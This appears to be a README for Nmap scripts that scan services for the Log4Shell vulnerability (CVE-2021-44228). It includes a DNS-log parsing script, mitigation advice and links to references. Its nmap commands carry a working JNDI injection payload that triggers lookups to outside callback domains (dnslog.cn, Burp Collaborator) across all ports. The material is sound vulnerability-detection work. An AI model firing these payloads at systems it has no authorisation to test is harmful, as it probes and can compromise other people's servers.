Nmap NSE scripts to check for the log4shell / LogJam vulnerability (CVE-2021-44228). The NSE scripts check the most popular services exposed on the Internet. They are basic scripts in which you can customize the payload.
Note that the NSE scripts only issue the requests to the services. Nmap will not report vulnerable hosts; you have to check the DNS logs of your callback domain to determine which hosts are vulnerable.
Also note that DNS resolution of a prefix combination nested in an expression (something like ${java:os}) does not seem to be supported by log4j-core <= 2.7, so testing with such a payload could lead to false negatives.
Therefore, it is better to accept a few false positives than false negatives.
Go to http://github.com/kost/logdns and get the DNS server. Get a domain and point it to wherever you have installed logdns:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.logdns.xxx}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
Go to http://dnslog.cn/ and click Get SubDomain. Replace xxxx with your subdomain:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.dnslog.cn}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
Take your domain from Burp Collaborator and replace xxxx with it:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.burpcollaborator.net/diverto}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
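Since Nmap only sends the payloads, the verification step is reading the DNS logs of the callback domain. The following is an added example, not part of the NSE scripts or of logdns; it assumes that {{target}} is expanded to the target's IPv4 address (so a callback name looks like 10.0.0.5.xxxx.logdns.example), that the query log uses the BIND-style "client A.B.C.D#port: query: NAME IN TYPE" format, and it uses constructed sample log lines. Hosts without a callback are reported as "no evidence", not as safe, because of the false-negative caveat above.

```python
import re
from ipaddress import ip_address

# Constructed BIND-style query log lines (not real data). The leftmost labels
# of each callback name are the scanned target's IP, as substituted for {{target}}.
SAMPLE_DNS_LOG = """\
12-Dec-2021 10:01:02.123 client 203.0.113.9#5353: query: 10.0.0.5.xxxx.logdns.example IN A +
12-Dec-2021 10:01:03.456 client 203.0.113.9#5353: query: 10.0.0.5.xxxx.logdns.example IN AAAA +
12-Dec-2021 10:01:07.789 client 198.51.100.20#40001: query: 10.0.0.7.xxxx.logdns.example IN A +
12-Dec-2021 10:02:00.000 client 198.51.100.20#40001: query: www.unrelated.example IN A +
"""

CALLBACK_DOMAIN = "xxxx.logdns.example"  # placeholder for your own logdns zone

QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def callbacks_from_log(log_text, callback_domain):
    """Map each target IP that triggered a lookup to the set of resolver IPs seen.

    Only names directly under the callback domain count, and the remaining
    prefix must parse as an IP address; anything else is ignored as noise.
    """
    hits = {}
    suffix = "." + callback_domain.lower()
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").lower().rstrip(".")
        if not qname.endswith(suffix):
            continue
        target = qname[: -len(suffix)]
        try:
            ip_address(target)  # raises ValueError for a non-IP label
        except ValueError:
            continue
        hits.setdefault(target, set()).add(m.group("src"))
    return hits


def classify_scanned_hosts(scanned, hits):
    """Split the scanned hosts into confirmed callbacks and 'no evidence'.

    A missing callback is not proof of safety (see the log4j-core <= 2.7 note),
    so those hosts are kept in a separate list instead of being marked clean.
    """
    confirmed = sorted(h for h in scanned if h in hits)
    no_evidence = sorted(h for h in scanned if h not in hits)
    return confirmed, no_evidence


if __name__ == "__main__":
    hits = callbacks_from_log(SAMPLE_DNS_LOG, CALLBACK_DOMAIN)
    confirmed, no_evidence = classify_scanned_hosts(["10.0.0.5", "10.0.0.6", "10.0.0.7"], hits)
    for host in confirmed:
        print(f"CALLBACK     {host}  via resolver(s) {', '.join(sorted(hits[host]))}")
    for host in no_evidence:
        print(f"NO EVIDENCE  {host}  (not proven safe)")
```

Feed it the real query log of your logdns server and the list of IPs you passed to nmap; the resolver IP is usually the target's upstream DNS server rather than the target itself.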
List of the best fixes and workarounds.
Best solution to protect against CVE-2021-44228: start your server with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later.
General references and links about the vulnerability
Reddit thread - General information about log4shell
NCC log4shell - operational information regarding the vulnerability (IOCs, mitigation, scanning, software)
BlueTeam CheatSheet Log4Shell - Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
Software List - cheat-sheet reference guide - Affected software list by vendor responses
log4shell.huntress.com - Online Log4Shell Vulnerability Tester
log4j yara - yara rules for local detection
identify-log4j-class-location.sh - Script to identify Log4J affected class for CVE-2021-44228 in a collection of ear/war/jar files
PoC-log4j-bypass-words - A trick to bypass words blocking patches
log4shell-detector - Detector for Log4Shell exploitation attempts
Log4Shell-IOCs - a list of IOC feeds and threat reports
log4j_rce_detection.md - Commands and rules you can use to search for exploitation attempts
log4j advisory - Apache Log4j Security Vulnerabilities
log4j pull request and comments - The pull request that fixes the bug, with comments
Logout4Shell - Quick and dirty alternative to patching manually